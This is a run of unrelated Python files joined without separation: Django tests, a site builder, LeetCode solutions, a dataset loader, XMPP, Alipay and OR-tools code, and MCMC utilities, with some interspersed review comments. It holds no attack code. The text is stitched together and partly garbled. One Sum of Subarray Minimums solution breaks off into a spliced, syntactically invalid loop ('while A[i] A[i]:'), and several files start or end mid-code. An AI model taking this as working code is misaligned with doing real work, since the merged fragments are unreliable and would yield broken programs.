int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'creator_user': request.user.first_name, 'site': site, 'account_type': 'Pro SMS', } self.assertEqual(render_to_string('registration/created_user_email_subject_fr.txt') % site.domain, sent_email.subject) self.assertEqual(render_to_string('registration/created_user_email_fr.html', ctx_dict), sent_email.body) def test_should_send_correct_email_in_html_format_in_english_to_a_newly_created_user(self): site = get_current_site(None) user = Mock(spec=User) user.email = '' user.id = 1 user.first_name = "test" language_code = "en" request = Mock() request.user.first_name = "rakoto" with patch("django.contrib.auth.tokens.default_token_generator.make_token") as make_token: make_token.return_value = "token" send_email_to_data_sender(user, language_code, type="created_user", request=request) emails = [mail.outbox.pop() for i in range(len(mail.outbox))] self.assertEqual(1, len(emails)) sent_email = emails[0] self.assertEqual("html", sent_email.content_subtype) self.assertEqual(settings.EMAIL_HOST_USER, sent_email.from_email) self.assertEqual([''], sent_email.to) self.assertEqual([settings.HNI_SUPPORT_EMAIL_ID], sent_email.bcc) ctx_dict = { 'domain': site.domain, 'uid': int_to_base36(user.id), 'user': user, 'token': "token", 'protocol': 'http', 'creator_user': request.user.first_name, 'site': site, 'account_type': 'Pro SMS', } self.assertEqual(render_to_string('registration/created_user_email_subject_en.txt') % site.domain, sent_email.subject) self.assertEqual(render_to_string('registration/created_user_email_en.html', ctx_dict), sent_email.body) def test_should_set_field_initial_value_as_none_if_not_populated(self): empty_field = TextField(name="text", code="code", label="what is ur name" ) empty_field.value = None form_model = 
FormModel(Mock(spec=DatabaseManager)) form_model.add_field(empty_field) mock_subject = Mock(spec=Entity) type(mock_subject).data = PropertyMock(return_value={}) initialize_values(form_model, mock_subject) self.assertEquals(None, empty_field.value) def test_should_convert_field_value_to_unicode_when_field_value_present(self): empty_field = TextField(name="text", code="code", label="what is ur name" ) empty_field.value = "FirstName" form_model = FormModel(Mock(spec=DatabaseManager)) form_model.add_field(empty_field) mock_subject = Mock(spec=Entity) type(mock_subject).data = PropertyMock(return_value={"text": {"value": "SomeValue"}}) initialize_values(form_model, mock_subject) self.assertIsInstance(empty_field.value, unicode) self.assertEquals(u"SomeValue", empty_field.value) def test_select_short_codes_sent_from_web_when_all_ids_not_selected(self): request = HttpRequest() request.POST = {"all_ids": "1;2;3"} self.assertEquals(_subject_short_codes_to_delete(request, Mock(DatabaseManager), "test_type"), ['1', '2', '3']) def test_select_short_codes_using_search_query_when_all_selected_on_web(self): request = HttpRequest() request.user = 'test' request.POST = {"all_ids": "1;2;3", "all_selected": "true", "search_query": "something"} with patch("datawinners.entity.view.unique_id.SubjectQuery") as mock_subject_query_class: with patch("datawinners.entity.view.unique_id.get_form_model_by_entity_type") as get_form_model_by_entity_type: with patch("datawinners.entity.view.unique_id.header_fields") as header_fields: instance = Mock(spec=SubjectQuery) mock_subject_query_class.return_value = instance mock_form_model = Mock(FormModel) get_form_model_by_entity_type.return_value = mock_form_model instance.query.return_value = [['s', 'x'], ['s', 'y']] header = OrderedDict() header.update({"name":"name"}) header.update({"short_code":"unique id"}) header_fields.return_value = header self.assertEquals(_subject_short_codes_to_delete(request, mock_form_model, "test_type"), ['x', 'y']) instance.query.assert_called_once_with('test', 'test_type', 'something') header_fields.assert_called_once_with(mock_form_model) def test_should_convert_datetime_to_string_after_subject_import(self): form_model = Mock(spec=FormModel) date_field = DateField('name', 'code', 'Date of birth', '') form_model.fields = [Mock(spec=TextField), date_field] subjects_data = {u'fac8': OrderedDict([('q2', u'Safidy'), ('q7', datetime.datetime(2010, 10, 10, 0, 0)), ('q6', u'fac8')]), u'fac9': OrderedDict([('q2', u'Emission'), ('q7', datetime.datetime(1947, 6, 26, 0, 0)), ('q6', u'fac9')]), u'fac7': OrderedDict([('q2', u'Patrick'), ('q7', datetime.datetime(2002, 3, 25, 0, 0)), ('q6', u'fac7')])} formated_data = _format_imported_subjects_datetime_field_to_str(form_model, subjects_data) expected_data = [[u'Safidy', '10-10-2010', u'fac8'], [u'Emission', '26-6-1947', u'fac9'], [u'Patrick', '25-3-2002', u'fac7']] self.assertEqual(expected_data, formated_data) amsifontes/hw3-my-site def ingest_base(base_file_path): base_file = open(base_file_path).read() return base_file def content_insert(template, content, insert_marker="{{ content }}"): output = template.replace(insert_marker, content) return output def main(): pages = [ { 'input': 'content/index.html', 'output': 'docs/index.html', 'title': 'Homepage', }, { 'input': 'content/bio.html', 'output': 'docs/bio.html', 'title': 'Bio', }, { 'input': 'content/blog.html', 'output': 'docs/blog.html', 'title': 'Blog', }, { 'input': 'content/projects.html', 'output': 'docs/projects.html', 'title': 'Projects', }, ] 
print("website fragments... assemble!!!") # ingest base template template = ingest_base('templates/base.html') # ingest dictionary for each page and assemble using metadata, # inserting/replacing title and content for page in pages: content = open(page['input']).read() full_page = content_insert(template, content) titled_full_page = content_insert(full_page, page['title'], insert_marker="{{ title }}") open(page['output'], 'w+').write(titled_full_page) print("fragments assembled successfully! :)") if __name__ == '__main__': main() # coding=utf-8 # Author: # Question: 49. Group Anagrams # Date: 16/02/2017 01:04-01:11 class Solution(object): def groupAnagrams(self, strs): """ :type strs: List[str] :rtype: List[List[str]] """ dic = {} for i in strs: root = ''.join(sorted(list(i))) if root in dic: dic[root].append(i) else: dic[root] = [i] return dic.values() s = Solution() print s.groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"]) # has_key已经在py3中弃用了,pythonic的方式是in # 如果是read,可以用get(key,default)或get(key) or default # root可以不用字符串而用tuple,tuple可以作为字典的key # sort可以用字典排序,复杂度On """ 907. Sum of Subarray Minimums Medium Given an array of integers arr, find the sum of min(b), where b ranges over every (contiguous) subarray of arr. Since the answer may be large, return the answer modulo 109 + 7. Example 1: Input: arr = [3,1,2,4] Output: 17 Explanation: Subarrays are [3], [1], [2], [4], [3,1], [1,2], [2,4], [3,1,2], [1,2,4], [3,1,2,4]. Minimums are 3, 1, 2, 4, 1, 1, 2, 1, 1, 1. Sum is 17. Example 2: Input: arr = [11,81,94,43,3] Output: 444 Constraints: 1 <= arr.length <= 3 * 104 1 <= arr[i] <= 3 * 104 """ # V0 # IDEA : increasing stacks class Solution: def sumSubarrayMins(self, A): n, mod = len(A), 10**9 + 7 left, right, s1, s2 = [0] * n, [0] * n, [], [] for i in range(n): count = 1 while s1 and s1[-1][0] > A[i]: count += s1.pop()[1] left[i] = count s1.append([A[i], count]) for i in range(n)[::-1]: count = 1 while s2 and s2[-1][0] >= A[i]: count += s2.pop()[1] right[i] = count s2.append([A[i], count]) return sum(a * l * r for a, l, r in zip(A, left, right)) % mod # V0' # IDEA : BRUTE FORCE (TLE) # brute force # class Solution(object): # def sumSubarrayMins(self, arr): # # edge case # if not arr: # return 0 # # double loop # res = [] # for i in range(len(arr)): # for j in range(i+1, len(arr)+1): # res.append(min(arr[i:j])) # return sum(res) # V1 # IDEA : increasing stacks # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/284184/Python-Max-Histogram class Solution: def sumSubarrayMins(self, A): A.append(-1) stack=[-1] res=0 for i in range(len(A)): while A[i] A[i]: count += s1.pop()[1] left[i] = count s1.append([A[i], count]) for i in range(n)[::-1]: count = 1 while s2 and s2[-1][0] >= A[i]: count += s2.pop()[1] right[i] = count s2.append([A[i], count]) return sum(a * l * r for a, l, r in zip(A, left, right)) % mod # V1 # IDEA : increasing stacks + above improvement # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/170750/JavaC%2B%2BPython-Stack-Solution class Solution: def sumSubarrayMins(self, A): res = 0 s = [] A = [0] + A + [0] for i, x in enumerate(A): while s and A[s[-1]] > x: j = s.pop() k = s[-1] res += A[j] * (i - j) * (j - k) s.append(i) return res % (10**9 + 7) # V1 # IDEA : STACK # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/374000/stack-python # IDEA : # Using a stack like the other solutions # # left[i] = k # means a[i] is the unique minima in a[ i - k + 1:i + 1] # # right[i] = k # means a[i] is a minima (possibly among others) in a[ i:i + 
k] # # final answer # sigma a[i] * left[i] * right[i] # # two passes O(n) # plus a third to sigma and compute that cumulative sum class Solution(object): def sumSubarrayMins(self, A): mod = 10 ** 9 + 7 left = self.f(A) right = self.g(A) cs = 0 for i in range(len(A)): cs = (cs + left[i] * right[i] * A[i]) % mod return cs def f(self,A): stack = collections.deque([]) left = [0] * len(A) for i in range(len(A)): while(stack and A[stack[-1]] > A[i]): stack.pop() left[i] = i - (stack[-1] if stack else -1) stack.append(i) return left def g(self,A): stack = collections.deque([]) right = [0] * len(A) for i in range(len(A)-1,-1,-1): while(stack and A[stack[-1]] >= A[i]): stack.pop() right[i] = (stack[-1] if stack else len(A)) - i stack.append(i) return right # V1 # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/170927/Python-Stack class Solution(object): def sumSubarrayMins(self, A): an = 0 stack = [[float('-inf'), 0, 0]] for x in A: c = 0 while stack[-1][0] >= x: c += stack.pop()[1] increase = stack[-1][2] + (c + 1)* x stack.append([x, c + 1, increase]) an += increase return an%(10**9+7) # V1 # https://leetcode.com/problems/sum-of-subarray-minimums/discuss/279705/python-solution class Solution: def sumSubarrayMins(self, A): n = len(A) left, right, sl, sr = [], [n] * n, [], [] for i in range(n): while sl and A[sl[-1]] > A[i]: sl.pop() left += [sl[-1]] if sl else [-1] sl += [i] for i in range(n): while sr and A[sr[-1]] > A[i]: right[sr.pop()] = i sr += [i] return sum(A[i] * (i - left[i]) * (right[i] - i) for i in range(n)) % (10**9 +7) # V1 # https://leetcode.jp/leetcode-907-sum-of-subarray-minimums-%E8%A7%A3%E9%A2%98%E6%80%9D%E8%B7%AF%E5%88%86%E6%9E%90/ # JAVA # public int sumSubarrayMins(int[] A) { # int[] leftBigger = new int[A.length]; # int[] rightBigger = new int[A.length]; # long sum = 0; # // 计算左边比自身大的数的个数 # for (int i = 0; i < A.length; i++) { # int countLeft = 1; # int j = i - 1; # while (j >= 0 && A[j] >= A[i]) { # countLeft += leftBigger[j]; # j -= leftBigger[j]; # } # leftBigger[i] = countLeft; # } # // 计算右边比自身大的数的个数 # for (int i = A.length - 1; i >= 0; i--) { # int countRight = 1; # int k = i + 1; # while (k < A.length && A[k] > A[i]) { # countRight += rightBigger[k]; # k += rightBigger[k]; # } # rightBigger[i] = countRight; # } # // 算出结果 # for (int i = 0; i < A.length; i++) { # sum += (A[i] * leftBigger[i] * rightBigger[i]); # } # return (int) (sum % 1000000007); # } # V1 # https://blog.csdn.net/zjucor/article/details/82721781 class Solution: def sumSubarrayMins(self, a): """ :type A: List[int] :rtype: int """ n=len(a) left,right=[0]*n,[0]*n st=[] for i,v in enumerate(a): while st and a[st[-1]]>v: idx=st.pop() right[idx]=i-idx st.append(i) while st: idx=st.pop() right[idx]=n-idx a=a[::-1] st=[] for i,v in enumerate(a): while st and a[st[-1]]>=v: idx=st.pop() left[idx]=i-idx st.append(i) while st: idx=st.pop() left[idx]=n-idx left=left[::-1] # print(left,right) a=a[::-1] res=0 mod=10**9+7 for i in range(n): # print(left[i]*right[i], a[i]) res+=left[i]*right[i]*a[i] res%=mod return res # V2 # Time: O(n) # Space: O(n) import itertools # Ascending stack solution class Solution(object): def sumSubarrayMins(self, A): """ :type A: List[int] :rtype: int """ M = 10**9 + 7 left, s1 = [0]*len(A), [] for i in range(len(A)): count = 1 while s1 and s1[-1][0] > A[i]: count += s1.pop()[1] left[i] = count s1.append([A[i], count]) right, s2 = [0]*len(A), [] for i in reversed(range(len(A))): count = 1 while s2 and s2[-1][0] >= A[i]: count += s2.pop()[1] right[i] = count s2.append([A[i], 
count]) return sum(a*l*r for a, l, r in zip(A, left, right)) % Mfoamliu/Look-Into-Person-v2 import os import random import cv2 as cv import numpy as np import torch from torch.utils.data import Dataset from torchvision import transforms from config import im_size, color_map, num_classes train_images_folder = 'data/instance-level_human_parsing/Training/Images' train_categories_folder = 'data/instance-level_human_parsing/Training/Category_ids' valid_images_folder = 'data/instance-level_human_parsing/Validation/Images' valid_categories_folder = 'data/instance-level_human_parsing/Validation/Category_ids' # Data augmentation and normalization for training # Just normalization for validation data_transforms = { 'train': transforms.Compose([ transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]), ]), 'valid': transforms.Compose([ transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ]), } def get_category(categories_folder, name): filename = os.path.join(categories_folder, name + '.png') semantic = cv.imread(filename, 0) return semantic def to_bgr(y_pred): ret = np.zeros((im_size, im_size, 3), np.float32) for r in range(320): for c in range(320): color_id = y_pred[r, c] # print("color_id: " + str(color_id)) ret[r, c, :] = color_map[color_id] ret = ret.astype(np.uint8) return ret def random_choice(image_size): height, width = image_size crop_height, crop_width = 320, 320 x = random.randint(0, max(0, width - crop_width)) y = random.randint(0, max(0, height - crop_height)) return x, y def safe_crop(mat, x, y): crop_height, crop_width = 320, 320 if len(mat.shape) == 2: ret = np.zeros((crop_height, crop_width), np.uint8) else: ret = np.zeros((crop_height, crop_width, 3), np.uint8) crop = mat[y:y + crop_height, x:x + crop_width] h, w = crop.shape[:2] ret[0:h, 0:w] = crop return ret class LIPDataset(Dataset): def __init__(self, split): self.usage = split if split == 'train': id_file = 'data/instance-level_human_parsing/Training/train_id.txt' self.images_folder = train_images_folder self.categories_folder = train_categories_folder else: id_file = 'data/instance-level_human_parsing/Validation/val_id.txt' self.images_folder = valid_images_folder self.categories_folder = valid_categories_folder with open(id_file, 'r') as f: self.names = f.read().splitlines() self.transformer = data_transforms[split] def __getitem__(self, i): name = self.names[i] filename = os.path.join(self.images_folder, name + '.jpg') img = cv.imread(filename) image_size = img.shape[:2] category = get_category(self.categories_folder, name) x, y = random_choice(image_size) img = safe_crop(img, x, y) category = safe_crop(category, x, y) category = np.clip(category, 0, num_classes - 1) if np.random.random_sample() > 0.5: img = np.fliplr(img) category = np.fliplr(category) img = img[..., ::-1] # RGB img = transforms.ToPILImage()(img) img = self.transformer(img) y = category return img, torch.from_numpy(y.copy()) def __len__(self): return len(self.names) if __name__ == "__main__": dataset = LIPDataset('train') print(dataset[0]) alexandru-dinu/competitive-programming0 # https://leetcode.com/problems/missing-number class Solution: def missingNumber(self, nums: List[int]) -> int: x = 0 for i in range(len(nums)): x ^= i ^ nums[i] return x ^ len(nums) # Slixmpp: The Slick XMPP Library # Copyright (C) 2015 # This file is part of Slixmpp. # See the file LICENSE for copying permission. 
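# (On to_bgr in the LIP dataset code above: the per-pixel double loop hard-codes
# range(320) even though the output buffer is allocated with im_size, and it is slow.
# If color_map behaves like an indexable array of BGR triples -- an assumption, since
# it is imported from config and not shown -- the whole lookup can be done with NumPy
# fancy indexing:)
import numpy as np

def to_bgr_vectorized(y_pred, color_map):
    """Map a (H, W) array of class ids to a (H, W, 3) uint8 color image."""
    palette = np.asarray(color_map, dtype=np.uint8)   # shape (num_classes, 3)
    return palette[y_pred]                            # index every pixel at once

# Example with a tiny made-up palette:
# palette = [[0, 0, 0], [0, 0, 255], [0, 255, 0]]
# ids = np.array([[0, 1], [2, 1]])
# to_bgr_vectorized(ids, palette).shape   # (2, 2, 3)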
from slixmpp.xmlstream import ElementBase class Confirm(ElementBase): name = 'confirm' namespace = 'http://jabber.org/protocol/http-auth' plugin_attrib = 'confirm' interfaces = {'id', 'url', 'method'} #!/usr/bin/env python import os from os.path import dirname from os.path import join app_dir = dirname(dirname(os.path.realpath(__file__))) prog = join(app_dir, "bin", "gen_data_sparse") # no trailing / prefix_path = join(app_dir, "datasets") params = { "num_train": 100 , "feature_dim": 10 , "num_partitions": 1 , "nnz_per_col": 10 , "one_based": True , "beta_sparsity": 0.5 , "correlation_strength": 0.5 , "noise_ratio": 0.1 , "snappy_compressed": "false" , "num_labels": 2 } params["output_file"] = join(prefix_path, "lr%d_dim%d_s%d_nnz%d") \ % (params["num_labels"], params["feature_dim"], \ params["num_train"], params["nnz_per_col"]) env_params = ( "GLOG_logtostderr=true " "GLOG_v=-1 " "GLOG_minloglevel=0 " ) cmd = env_params + prog cmd += "".join([" --%s=%s" % (k,v) for k,v in params.items()]) print cmd os.system(cmd) 1-10 import yaml, os class ConfigParser: def __init__(self, args): # load model configuration cfg_file = os.path.join('conf', args.config+'.yaml') with open(cfg_file) as f: self.config = yaml.load(f, Loader=yaml.FullLoader) # load argument for arg in args.__dict__: self.config[arg] = args.__dict__[arg] # string None handing self.convert_None(self.config) def __getitem__(self, name): return self.config[name] def convert_None(self, d): for key in d: if d[key] == 'None': d[key] = None if isinstance(d[key], dict): self.convert_None(d[key]) if __name__ == "__main__": import argparse args = argparse.ArgumentParser() args.add_argument('-c', '--config', default=None, type=str) args.add_argument('-d', '--device', default=None, type=str) args.add_argument('-r', '--resume', action='store_true') args = args.parse_args() args.config = "./conf/resnet_cfg.yaml" cp = ConfigParser(args) #!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class ZhimaCreditPayafteruseCreditagreementSignModel(object): def __init__(self): self._cancel_back_link = None self._category_id = None self._external_logon_id = None self._extra_param = None self._out_agreement_no = None self._product_code = None self._return_back_link = None self._zm_service_id = None @property def cancel_back_link(self): return self._cancel_back_link @cancel_back_link.setter def cancel_back_link(self, value): self._cancel_back_link = value @property def category_id(self): return self._category_id @category_id.setter def category_id(self, value): self._category_id = value @property def external_logon_id(self): return self._external_logon_id @external_logon_id.setter def external_logon_id(self, value): self._external_logon_id = value @property def extra_param(self): return self._extra_param @extra_param.setter def extra_param(self, value): self._extra_param = value @property def out_agreement_no(self): return self._out_agreement_no @out_agreement_no.setter def out_agreement_no(self, value): self._out_agreement_no = value @property def product_code(self): return self._product_code @product_code.setter def product_code(self, value): self._product_code = value @property def return_back_link(self): return self._return_back_link @return_back_link.setter def return_back_link(self, value): self._return_back_link = value @property def zm_service_id(self): return self._zm_service_id @zm_service_id.setter def zm_service_id(self, value): self._zm_service_id = value def to_alipay_dict(self): params 
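# (On the gen_data_sparse launcher earlier in this row: `print cmd` is Python 2
# syntax, and building one big shell string for os.system makes quoting fragile.
# A Python 3 sketch of the same launch using subprocess.run, with the GLOG settings
# passed through env= instead of being prepended to the command string -- the
# function name is mine:)
import os
import subprocess

def run_gen_data(prog, params):
    env = dict(os.environ,
               GLOG_logtostderr="true", GLOG_v="-1", GLOG_minloglevel="0")
    args = [prog] + ["--%s=%s" % (k, v) for k, v in params.items()]
    print(" ".join(args))                 # show what will be executed
    subprocess.run(args, env=env, check=True)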
= dict() if self.cancel_back_link: if hasattr(self.cancel_back_link, 'to_alipay_dict'): params['cancel_back_link'] = self.cancel_back_link.to_alipay_dict() else: params['cancel_back_link'] = self.cancel_back_link if self.category_id: if hasattr(self.category_id, 'to_alipay_dict'): params['category_id'] = self.category_id.to_alipay_dict() else: params['category_id'] = self.category_id if self.external_logon_id: if hasattr(self.external_logon_id, 'to_alipay_dict'): params['external_logon_id'] = self.external_logon_id.to_alipay_dict() else: params['external_logon_id'] = self.external_logon_id if self.extra_param: if hasattr(self.extra_param, 'to_alipay_dict'): params['extra_param'] = self.extra_param.to_alipay_dict() else: params['extra_param'] = self.extra_param if self.out_agreement_no: if hasattr(self.out_agreement_no, 'to_alipay_dict'): params['out_agreement_no'] = self.out_agreement_no.to_alipay_dict() else: params['out_agreement_no'] = self.out_agreement_no if self.product_code: if hasattr(self.product_code, 'to_alipay_dict'): params['product_code'] = self.product_code.to_alipay_dict() else: params['product_code'] = self.product_code if self.return_back_link: if hasattr(self.return_back_link, 'to_alipay_dict'): params['return_back_link'] = self.return_back_link.to_alipay_dict() else: params['return_back_link'] = self.return_back_link if self.zm_service_id: if hasattr(self.zm_service_id, 'to_alipay_dict'): params['zm_service_id'] = self.zm_service_id.to_alipay_dict() else: params['zm_service_id'] = self.zm_service_id return params @staticmethod def from_alipay_dict(d): if not d: return None o = ZhimaCreditPayafteruseCreditagreementSignModel() if 'cancel_back_link' in d: o.cancel_back_link = d['cancel_back_link'] if 'category_id' in d: o.category_id = d['category_id'] if 'external_logon_id' in d: o.external_logon_id = d['external_logon_id'] if 'extra_param' in d: o.extra_param = d['extra_param'] if 'out_agreement_no' in d: o.out_agreement_no = d['out_agreement_no'] if 'product_code' in d: o.product_code = d['product_code'] if 'return_back_link' in d: o.return_back_link = d['return_back_link'] if 'zm_service_id' in d: o.zm_service_id = d['zm_service_id'] return o from ..search import * import os import time import pytest import logging _log = logging.getLogger('yanytapi.search.test') api_key = os.environ['API_KEY'] def test_search_no_results(): api = SearchAPI(api_key) results = api.search('sadflkjsdf') start = time.perf_counter() assert len(list(results)) == 0 assert time.perf_counter()-start < 6 def test_auto_delay(): api = SearchAPI(api_key) results = api.search('trump') start = time.perf_counter() _log.debug("%s", results.__next__().__str__()) for i in range(0, 20): results.__next__() assert time.perf_counter()-start > 6 def test_backoff_exception(): with pytest.raises(TooManyRequestsException): api = SearchAPI(api_key) results = api.search('trump', auto_sleep=False) for i in range(0, 200): results.__next__() time.sleep(70) def test_page_limit(): api = SearchAPI(api_key) results = api.search('trump', page_limit=2, auto_sleep=False) assert len(list(results)) == 20 # Copyright 2021 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Grocery problem in OR-tools CP-SAT Solver. From , , Finite Domain http://www.mozart-oz.org/documentation/fdt/ Constraint Programming in Oz. A Tutorial. 2001. ''' A kid goes into a grocery store and buys four items. The cashier charges $7.11, the kid pays and is about to leave when the cashier calls the kid back, and says 'Hold on, I multiplied the four items instead of adding them; I'll try again; Hah, with adding them the price still comes to $7.11'. What were the prices of the four items? ''' This is a port of my old CP model grocery.py This model was created by () Also see my other OR-tools models: http://www.hakank.org/or_tools/ """ from __future__ import print_function from ortools.sat.python import cp_model as cp import math, sys from cp_sat_utils import prod, increasing from functools import reduce def main(): model = cp.CpModel() # # data # n = 4 c = 711 # # declare variables # item = [model.NewIntVar(0, c, "item[%i]" % i) for i in range(n)] # # constraints # model.Add(sum(item) == c) prod(model, item, c * 100**3) # symmetry breaking increasing(model, item) # # search and result # solver = cp.CpSolver() status = solver.Solve(model) if status == cp.OPTIMAL: print("item:", [solver.Value(item[i]) for i in range(n)]) print() print("NumConflicts:", solver.NumConflicts()) print("NumBranches:", solver.NumBranches()) print("WallTime:", solver.WallTime()) if __name__ == "__main__": main() puat133/MCMC-MultiSPDE # -*- coding: utf-8 -*- """ Created on Thu Dec 13 14:17:09 2018 @author: puat133 """ # import math import h5py import scipy.io as sio import numpy as np import scipy.linalg as sla import numba as nb import time import math FASTMATH=True PARALLEL = False CACHE=True # from numba import complex64, complex128, float32, float64, int32, jit, njit, prange SQRT2 = np.sqrt(2) njitSerial = nb.njit(fastmath=FASTMATH,cache=CACHE) jitSerial = nb.jit(fastmath=FASTMATH,cache=CACHE) njitParallel = nb.njit(fastmath=FASTMATH,cache=CACHE,parallel=PARALLEL) jitParallel = nb.jit(fastmath=FASTMATH,cache=CACHE,parallel=PARALLEL) @njitSerial def construct_w_Half(n): wHalf = np.random.randn(n)+1j*np.random.randn(n) # wHalf[0] = wHalf[0].real*np.sqrt(2) wHalf[0] = 2*wHalf[0].real # return wHalf/np.sqrt(2) return wHalf/SQRT2 @njitParallel def inner(u,v): sumUV = 0 for i in nb.prange(len(u)): sumUV += u[i]*v[i] return sumUV # @nb.vectorize([nb.complex128(nb.int64,nb.float64)],cache=CACHE,nopython=True) @njitParallel def eigenFunction1D(i,t): """ Return an eigen function of Laplacian operator in one dimension i - index int t - time float """ return np.exp(2*np.pi*1j*i*t) @njitParallel def matMulti(A,D): """ Matrix multiplication A@D where A,D is a diagonal matrices, and D is a diagonal matrix """ C = np.zeros(A.shape,dtype=np.complex128) for i in nb.prange(A.shape[0]): for j in nb.prange(A.shape[1]): C[i,j] = A[i,j]*D[j,j] return C # @njitParallel # def logDet(L): # """ # # The determinant of a Hermitian matrix is real;the determinant is the product of the matrix's eigenvalues # # L^dagger L is Hermitian # """ # return (np.linalg.slogdet(L)[1]) # # return 0.5*(np.linalg.slogdet(L.T.conj()@L)[1]) # # return 
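# (On the grocery model above: the prod(...) and increasing(...) helpers come from
# hakank's cp_sat_utils and are not shown here. A sketch of how a product constraint
# like prod(model, item, c * 100**3) can be expressed directly in CP-SAT, chaining
# AddMultiplicationEquality pairwise through intermediate variables -- names are
# mine, and this is an illustration rather than the original helper:)
from ortools.sat.python import cp_model as cp

def add_product_equals(model, variables, target_value, upper_bound):
    """Constrain the product of `variables` to equal `target_value`."""
    running = variables[0]
    for i, v in enumerate(variables[1:], start=1):
        partial = model.NewIntVar(0, upper_bound, "prod_%d" % i)
        model.AddMultiplicationEquality(partial, [running, v])
        running = partial
    model.Add(running == target_value)

# In the grocery model this would be used roughly as:
# add_product_equals(model, item, c * 100**3, c * 100**3)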
0.5*np.sum(np.log(np.linalg.eigvalsh(L.T.conj()@L))) # # return np.sum(np.log(np.absolute(np.linalg.eigvals(L)))) # @nb.vectorize([nb.float64(nb.float64)],cache=CACHE,nopython=True) @njitParallel def kappaFun(ut): """ kappa function as a function of u in time domain """ # res = np.zeros(ut.shape[0],dtype=np.float64) # for i in nb.prange(ut.shape[0]): # res[i] = math.exp(-ut[i]) # return res return np.exp(-ut) # @nb.vectorize([nb.float64(nb.float64)],cache=CACHE,nopython=True) @njitParallel def kappa_pow_min_nu(ut): # res = np.zeros(ut.shape[0],dtype=np.float64) # for i in nb.prange(ut.shape[0]): # res[i] = math.exp(1.5*ut[i]) # return res # return kappaFun(ut)**(-1.5) return np.exp(1.5*ut) # @nb.vectorize([nb.float64(nb.float64)],cache=CACHE,nopython=True) @njitParallel def kappa_pow_half(ut): # res = np.zeros(ut.shape[0],dtype=np.float64) # for i in nb.prange(ut.shape[0]): # res[i] = math.exp(-0.5*ut[i]) # return res return np.exp(-0.5*ut) # return np.sqrt(kappaFun(ut)) @njitParallel def norm2(u): """ Compute euclidean squared norm 2 of a complex vector """ norm2=0 for i in nb.prange(len(u)): norm2 += u[i].imag*u[i].imag + u[i].real*u[i].real return norm2 def printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '#'): """ Call in a loop to create terminal progress bar @params: iteration - Required : current iteration (Int) total - Required : total iterations (Int) prefix - Optional : prefix string (Str) suffix - Optional : suffix string (Str) decimals - Optional : positive number of decimals in percent complete (Int) length - Optional : character length of bar (Int) fill - Optional : bar fill character (Str) """ percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total))) filledLength = int(length * iteration // total) bar = fill * filledLength + '-' * (length - filledLength) print('\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end = '\r') # Print New Line on Complete if iteration == total: print() @njitSerial def sigmasLancos(n): """ sigma Lancos coefficients for calculating inverse Fourier Transforms """ k = np.arange(1,n+1) return np.sin(np.pi*(k/(n+1)))/(np.pi*(k/(n+1))) @njitSerial def updateWelford(existingAggregate, newValue): (count, mean, M2) = existingAggregate count += 1 delta = newValue - mean mean += delta / count delta2 = newValue - mean M2 += delta * delta2 return (count, mean, M2) # # retrieve the mean, variance and sample variance from an aggregate @njitSerial def finalizeWelford(existingAggregate): (count, mean, M2) = existingAggregate # (mean, variance, sampleVariance) = (mean, M2/count, M2/(count - 1)) (mean, variance) = (mean, M2/count) # if count < 2: # return float('nan') # else: return (mean, variance) @njitSerial def extend(uSymmetric,num): n = (uSymmetric.shape[0]+1)//2 if num> n: z = np.zeros(2*num-1,dtype=np.complex128) z[(num-1)-(n-1):(num-1)+n] = uSymmetric return z else: return uSymmetric @njitSerial def symmetrize(w_half): w = np.concatenate((w_half[:0:-1].conj(),w_half)) #symmetrize return w def kaczmarz(A,b,max_iteration): m = A.shape[0] n = A.shape[1] if m != b.shape[0]: raise Exception("Matrix and vector size missmatch") #set initial condition: x = np.zeros(n,dtype=np.complex128) #computing probability of each row # prob_row = np.zeros(m,dtype=np.float64) A_row_squared_norm = np.zeros(m,dtype=np.float64) # A_normalized = A for i in nb.prange(m): A_row_squared_norm[i] = norm2(A[i,:]) #in_place_normalization A[i,:] = A[i,:]/np.sqrt(A_row_squared_norm[i]) b[i] = 
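# (Usage sketch for the Welford helpers above: the aggregate is just a
# (count, mean, M2) tuple that is threaded through updateWelford and finalized once
# at the end -- handy for streaming mean/variance without storing samples.
# Illustrative only:)
#
#     agg = (0, 0.0, 0.0)                 # count, running mean, running M2
#     for value in (2.0, 4.0, 4.0, 4.0, 5.0, 5.0, 7.0, 9.0):
#         agg = updateWelford(agg, value)
#     mean, variance = finalizeWelford(agg)
#     # mean == 5.0, population variance == 4.0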
